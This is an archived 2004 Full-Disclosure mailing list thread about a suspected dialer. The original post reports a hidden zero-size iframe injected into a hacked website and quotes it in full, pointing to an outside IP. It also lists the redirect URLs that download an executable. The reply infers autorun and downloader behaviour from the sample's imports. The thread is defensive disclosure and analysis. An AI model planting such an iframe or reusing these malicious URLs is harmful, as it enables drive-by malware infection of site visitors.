RE: [Full-Disclosure] Possible dialer on 62.4.84.150

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukh_at_online.gateway.technolabs.net)
Date: 08/21/04

  • Next message: michael williamson: "Re: [Full-Disclosure] The 'good worm' from HP" 
    To: "Daniel Bartlett" <danbuk_fd@warpmail.net>, "Full Disclosure" <full-disclosure@lists.netsys.com>
Date: Sat, 21 Aug 2004 17:56:27 +0530

    KERNEL32.DLL
    0000 LoadLibraryA
    0000 GetProcAddress
    0000 ExitProcess

    advapi32.dll
    0000 RegCloseKey

    oleaut32.dll
    0000 SysFreeString

    shell32.dll
    0000 ShellExecuteA

    user32.dll
    0000 SetTimer

    all these exports show point in a direction that it creates a key in the registry for autoloading on reboot and executes a executable, possibly this is a downloader that downloads someother program from somewhere which i have not been able to find yet!

    -aditya

    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com]On Behalf Of Daniel
    Bartlett
    Sent: Wednesday, August 18, 2004 12:17 AM
    To: Full Disclosure
    Subject: [Full-Disclosure] Possible dialer on 62.4.84.150

    Hi All,
    I've only looked at this for about 3 mins, so there isn't a lot to tell.
    From a website that looks like someone has hacked it and added a IFRAME
    to the top of the page:
    <iframe FRAMEBORDER="0" width="0" height="0"
    src="http://213.158.119.103/iframe.php?xid=111"></iframe>
    From this frame it gets bounced onto:
    http://62.4.84.150/data/start.php?id=111-b&aid=0
    then onto:
    http://62.4.84.150/data/start.php?id=111-download&aid=0
    which then downloads a 17984b exe file.
    I've attached a strings output from the exe, and a copy of the
    exe(password for zip is lamedial).

    I hope someone else can shead more light on this than I can.

    Cheers,
    Daniel B. 

    -- 
  Daniel Bartlett
  danbuk_fd@warpmail.net
________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
  • Next message: michael williamson: "Re: [Full-Disclosure] The 'good worm' from HP"
    • Quantcast